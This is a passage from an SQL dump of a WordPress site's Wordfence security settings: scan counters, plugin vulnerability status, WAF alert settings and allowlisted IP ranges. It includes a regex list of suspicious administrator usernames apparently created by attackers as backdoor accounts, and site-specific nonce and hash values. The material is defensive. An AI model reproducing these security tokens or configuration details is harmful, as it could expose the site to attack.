Feed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/accessing-and-consuming-the-vulnerability-data-feed\\/\",\"order\":1},{\"title\":\"Wordfence Intelligence Webhook Notifications\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/wordfence-intelligence-webhook-notifications\\/\",\"order\":2}],\"order\":17}]}','yes'),
('supportHash','b08dc0902cf6fee340fe72de085ba1e37233c761a0f6c4b950152647b3a5abb8','yes'),
('suspiciousAdminUsernames','a:2:{i:0;s:46:\"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i\";i:1;s:55:\"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i\";}','yes'),
('timeoffset_wf','0','yes'),
('timeoffset_wf_updated','1723521061','yes'),
('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|ceo|cfa|cfd|cpa|crs|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|scb|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|aero|akdn|ally|amex|arab|army|arpa|arte|asda|asia|audi|auto|baby|audio|author|baidu|audible|band|azure|bank|beer|bike|bing|blue|book|cash|bauhaus|best|blog|bond|autos|bbva|bayern|buzz|beats|cafe|black|banamex|barcelona|blockbuster|casa|bloomberg|bnpparibas|boats|bofa|camp|cars|boehringer|care|auspost|call|blackfriday|case|bingo|basketball|barclaycard|barclays|bible|barefoot|berlin|bharti|bentley|bestbuy|bargains|beauty|baseball|catering|cbre|cards|cern|club|cool|chase|chat|cheap|cisco|citi|canon|citic|city|coop|click|cloud|auction|coach|codes|crown|camera|cymru|career|casino|delta|booking|cyou|bosch|bostik|caravan|data|date|boston|careers|boutique|bradesco|bridgestone|broadway|builders|dclk|broker|brother|dell|desi|build|dabur|diet|dance|brussels|capetown|calvinklein|capital|deal|deals|capitalone|dish|business|docs|actor|accountants|free|adult|fido|film|fire|fish|food|ford|guge|guru|hair|aetna|dvag|africa|agency|agakhan|airbus|airtel|alibaba|alipay|airforce|allfinanz|flir|alsace|alstom|amazon|allstate|americanexpress|americanfamily|amfam|accountant|erni|fans|farm|fund|game|gbiz|gent|ggee|athleta|fage|fail|fast|gift|forex|forum|abbott|abbvie|accenture|gallo|attorney|gifts|golf|goog|academy|gold|games|george|gives|globo|gripe|group|abudhabi|green|gucci|abogado|glass|gmbh|gmail|guide|haus|hsbc|icbc|ieee|imdb|jprs|kddi|kids|kiwi|maif|mini|apple|mint|mobi|aquarelle|moda|moto|name|navy|prod|prof|qpon|read|reit|rent|rest|sncf|amica|rich|edeka|star|surf|talk|taxi|work|earth|anquan|yoga|apartments|wine|xbox|aramco|immo|info|associates|itau|java|jeep|jobs|email|menu|news|archi|next|nico|nike|ollo|open|page|pars|pccw|pics|ping|pink|play|plus|pohl|porn|post|team|tech|teva|tiaa|tips|toys|zone|dubai|town|drive|tube|zara|zero|epson|hdfc|faith|fedex|help|here|host|land|lidl|homes|kpmg|kred|lease|legal|lego|lexus|lgbt|life|honda|link|horse|live|jetzt|like|koeln|lilly|limo|lipsy|loan|love|meet|meme|house|ltda|nokia|ruhr|irish|luxe|nikon|ninja|nowtv|rsvp|paris|parts|party|pharmacy|plumbing|poker|politie|room|physio|safe|photos|pictet|pictures|sale|loans|omega|osaka|photo|photography|sarl|lamer|phone|philips|pioneer|pizza|save|saxo|place|playstation|scot|seat|analytics|silk|sina|site|sohu|viva|vivo|vote|voto|wang|final|skin|spot|vana|visa|weir|wien|wiki|hyatt|android|genting|ikano|amsterdam|media|movie|sexy|locus|miami|music|seek|song|kyoto|lotte|lotto|mango|money|nexus|promo|quebec|show|protection|shop|property|properties|quest|sony|praxi|press|pramerica|prime|racing|shia|rehab|productions|recipes|redstone|progressive|prudential|radio|realtor|realestate|realty|redumbrella|reise|durban|emerck|energy|engineer|engineering|enterprises|ericsson|estate|education|events|exchange|expert|exposed|joburg|express|jaguar|jewelry|kindle|kitchen|komatsu|catholic|istanbul|pfizer|jpmorgan|rugby|equipment|kaufen|rocks|rodeo|juegos|juniper|ricoh|eurovision|extraspace|kosher|salon|family|shell|sling|dunlop|dupont|sener|seven|shoes|discover|doctor|domains|skype|sport|download|latino|ismaili|lefrak|space|lacaixa|lanxess|shouji|smart|solar|lasalle|lawyer|leclerc|singles|soccer|social|latrobe|lighting|limited|shiksha|shopping|smile|softbank|software|fairwinds|sharp|florist|futbol|gallup|garden|giving|fitness|flickr|global|google|gratis|health|finance|flights|hermes|farmers|ferrero|hiphop|ferrari|fishing|hockey|fashion|hotels|flowers|frogans|hamburg|hangout|football|forsale|grocery|guitars|hitachi|foundation|fresenius|frontier|fujitsu|godaddy|holiday|goodyear|goldpoint|grainger|graphics|healthcare|hosting|furniture|gallery|insure|intuit|hdfcbank|hotmail|hughes|feedback|hyundai|fidelity|imamat|hospital|infiniti|firestone|firmdale|helsinki|holdings|homegoods|homesense|institute|insurance|international|investments|ipiranga|financial|hisamitsu|homedepot|immobilien|industries|kuokgroup|landrover|lifeinsurance|lifestyle|solutions|kerryhotels|kerryproperties|lancaster|kerrylogistics|lamborghini|stada|chrome|circle|tires|church|claims|clinic|cruise|museum|chintai|clubmed|company|tirol|center|chanel|coffee|condos|college|tjmaxx|channel|charity|cologne|comsec|tkmaxx|citadel|compare|coupon|country|cricket|monash|monster|mormon|cruises|computer|credit|contact|cooking|corsica|coupons|courses|creditunion|lincoln|mobile|mortgage|tmall|moscow|nagoya|netbank|reisen|netflix|nowruz|olayan|online|oracle|orange|otsuka|organic|origins|rentals|christmas|office|tienda|okinawa|cipriani|cleaning|clinique|tokyo|network|neustar|clothing|nissan|reliance|community|cuisinella|nissay|norton|commbank|observer|panasonic|partners|today|shangrila|style|sucks|nextdirect|olayangroup|store|construction|consulting|study|swiss|tatar|tools|contractors|motorcycles|toray|total|toshiba|creditcard|tickets|tours|ubank|delivery|dental|living|trade|direct|locker|wales|design|london|madrid|maison|sakura|management|samsclub|samsung|sandvik|tushu|luxury|makeup|market|safety|trust|theatre|sandvikcoromant|sanofi|volvo|school|schule|vodka|watch|search|secure|select|tunes|vegas|video|viajes|schwarz|vision|lplfinancial|virgin|schmidt|science|security|viking|villas|voting|voyage|dentist|digital|walmart|walter|wanggou|services|directory|discount|theater|watches|deloitte|democrat|diamonds|lundbeck|schaeffler|vlaanderen|scholarships|webcam|weather|weatherchannel|weber|datsun|dealer|degree|repair|marriott|mattel|tattoo|mckinsey|target|works|world|dating|markets|rogers|taipei|taobao|xihuan|windows|winners|melbourne|xerox|memorial|merckmsd|yahoo|marketing|richardli|tennis|microsoft|report|review|ryukyu|yachts|republican|yandex|reviews|rexroth|temasek|yamaxun|youtube|zappos|mitsubishi|restaurant|saarland|suzuki|toyota|statebank|stockholm|storage|stream|studio|staples|unicom|supplies|supply|support|marshalls|stcgroup|surgery|swatch|sydney|systems|travel|trading|training|vanguard|ventures|verisign|whoswho|xn--90ae|xn--node|xn--p1ai|zuerich|travelers|xn--qxam|statefarm|vacations|wedding|tatamotors|weibo|woodside|xn--ngbrx|xn--3pxu8k|xn--l1acc|technology|university|website|xn--30rr7y|xn--90ais|xn--45q11c|xn--80aswg|xn--nqv7f|xn--90a3ac|xn--d1alf|xn--e1a4c|xn--4gbrim|xn--55qx5d|xn--5tzm5g|xn--9dbq2a|xn--j1aef|xn--j1amh|xn--9et52u|xn--c1avg|xn--c2br7g|xn--cg4bki|xn--p1acf|xn--qxa6a|xn--czrs0t|xn--czru2d|xn--tckwe|xn--vhquv|xn--fiq64b|yokohama|xn--fhbei|yodobashi|xn--fiqs8s|xn--fiqz9s|xn--55qw42g|xn--6frz82g|xn--d1acj3b|xn--80adxhks|xn--80ao21a|xn--czr694b|xn--fct429k|xn--54b7fta0cc|xn--80asehdb|xn--8y0a063a|xn--9krt00a|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--cckwcxetd|xn--6qq986b3xl|xn--5su34j936bgsg|xn--cck2b3b|xn--80aqecdr1a|xn--o3cw4h|williamhill|xn--11b4c3d|xn--1qqw23a|xn--2scrj9c|xn--rhqv96g|xn--rovu88b|xn--s9brj9c|xn--ses554g|xn--t60b56a|versicherung|xn--3bst00m|xn--4dbrk0ce|wolterskluwer|xn--1ck2e1b|xn--3ds443g|xn--3e0b707e|xn--3hcrj9c|xn--42c2d9a|xn--45br5cyl|xn--45brj9c|xn--eckvdtc9d|xn--pssy2u|xn--q7ce6a|xn--pgbs0dh|xn--q9jyb4c|travelersinsurance|xn--efvy88h|xn--otu796d|xn--ogbpf8fl|xn--qcka1pmc|xn--tiq49xqyj|xn--unup4y|xn--vuq861b|xn--w4rs40l|xn--wgbh1c|xn--wgbl6a|xn--xhq521b|xn--y9a3aq|xn--ygbi2ammx|xn--zfr164b|xn--yfro4i67o|xn--fiq228c5hs|xn--io0a7i|xn--kput3i|xn--fjq720a|xn--flw351e|xn--g2xx48c|xn--gecrj9c|xn--gk3at1e|xn--h2brj9c|xn--hxt814e|xn--imr513n|xn--j6w193g|xn--jvr189m|xn--kprw13d|xn--kpry57d|xn--jlq480n2rg|xn--lgbbat1ad8j|xn--mgb9awbf|xn--kcrx77d1x4a|xn--nyqy26a|xn--i1b6b1a6a2e|xn--clchc0ea0b2g2a9gcd|xn--gckr3f0f|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--h2brj9c8c|xn--h2breg3eve|xn--fzys8d69uvgm|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbayh7gpa|xn--mgbbh1a|xn--mgbtx2b|xn--mgbab2bd|xn--mgbbh1a71e|xn--mgbca7dzdo|xn--mgbc0a9azcg|xn--mgbpl2fh|xn--mgbi4ecexp|xn--mix891f|xn--mgbt3dhd|xn--mk1bu44c|xn--mxtq1m|xn--ngbc5azd|xn--mgbaam7a8h|xn--ngbe9e0a|xn--mgbx4cd0ab|xn--mgbcpq6gpa1a|xn--mgbgu82a|xn--mgberp4a5d4ar|xn--rvc1e0am3e|xn--xkc2al3hye2a|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--nqv7fs00ema|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--w4r85el8fhu5dnra|xn--xkc2dl3a5ee0h|','no'),
('tldlistHash','8f6f78c307e209081cb649d9a6636491c96ab9896980517468beeb5fd7e82562','yes'),
('total503s','1765','yes'),
('totalAlertsSent','27','yes'),
('totalIPsBlocked','1764','yes'),
('totalIPsLocked','6','yes'),
('totalLoginHits','4047','yes'),
('totalLogins','17','yes'),
('totalScansRun','419','yes'),
('touppBypassNextCheck','0','yes'),
('touppPromptNeeded','','yes'),
('vulnerabilities_core','a:1:{s:7:\"current\";a:4:{s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;s:5:\"score\";N;s:6:\"vector\";N;}}','no'),
('vulnerabilities_plugin','a:7:{i:0;a:5:{s:4:\"slug\";s:27:\"disable-remove-google-fonts\";s:11:\"fromVersion\";s:5:\"1.6.3\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:5:\"1.6.4\";s:4:\"link\";b:0;}i:1;a:4:{s:4:\"slug\";s:14:\"duplicate-page\";s:11:\"fromVersion\";s:5:\"4.5.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:4:{s:4:\"slug\";s:9:\"elementor\";s:11:\"fromVersion\";s:6:\"3.23.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:3;a:4:{s:4:\"slug\";s:17:\"syntaxhighlighter\";s:11:\"fromVersion\";s:5:\"3.7.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:4;a:4:{s:4:\"slug\";s:9:\"wordfence\";s:11:\"fromVersion\";s:6:\"7.11.7\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:5;a:4:{s:4:\"slug\";s:13:\"wordpress-seo\";s:11:\"fromVersion\";s:4:\"23.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:6;a:4:{s:4:\"slug\";s:13:\"elementor-pro\";s:11:\"fromVersion\";s:6:\"3.23.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','no'),
('vulnerabilities_theme','a:2:{i:0;a:5:{s:4:\"slug\";s:15:\"hello-elementor\";s:9:\"toVersion\";s:5:\"3.1.1\";s:11:\"fromVersion\";s:5:\"3.1.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:16:\"twentytwentyfour\";s:9:\"toVersion\";s:3:\"1.2\";s:11:\"fromVersion\";s:3:\"1.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','no'),
('wafAlertInterval','600','yes'),
('wafAlertLastSendTime','1712365283','yes'),
('wafAlertOnAttacks','1','yes'),
('wafAlertThreshold','100','yes'),
('wafAlertWhitelist','','yes'),
('wafStatusCallbackNonce','bb960f92bd0e15da72657a93cc2465da421327f68b1c1190f5ff94969e1ee268','yes'),
('waf_status','enabled','yes'),
('wfKillRequested','0','no'),
('wfPeakMemory','91156480','no'),
('wfScanStartVersion','6.6.1','yes'),
('wfsd_engine','','no'),
('wfStatusStartMsgs','a:26:{i:0;s:0:\"\";i:1;s:0:\"\";i:2;s:0:\"\";i:3;s:0:\"\";i:4;s:0:\"\";i:5;s:0:\"\";i:6;s:0:\"\";i:7;s:0:\"\";i:8;s:0:\"\";i:9;s:0:\"\";i:10;s:0:\"\";i:11;s:0:\"\";i:12;s:0:\"\";i:13;s:0:\"\";i:14;s:0:\"\";i:15;s:0:\"\";i:16;s:0:\"\";i:17;s:0:\"\";i:18;s:0:\"\";i:19;s:0:\"\";i:20;s:0:\"\";i:21;s:0:\"\";i:22;s:0:\"\";i:23;s:0:\"\";i:24;s:0:\"\";i:25;s:0:\"\";}','yes'),
('wf_scanLastStatusTime','0','yes'),
('wf_scanRunning','','yes'),
('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:22;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:7447;s:14:\"scannedPlugins\";i:7;s:13:\"scannedThemes\";i:2;s:12:\"scannedUsers\";i:3;s:11:\"scannedURLs\";i:2273;s:10:\"lastUpdate\";i:1723521237;}','yes'),
('whitelisted','','yes'),
('whitelistedServices','{}','yes'),
('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),
('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\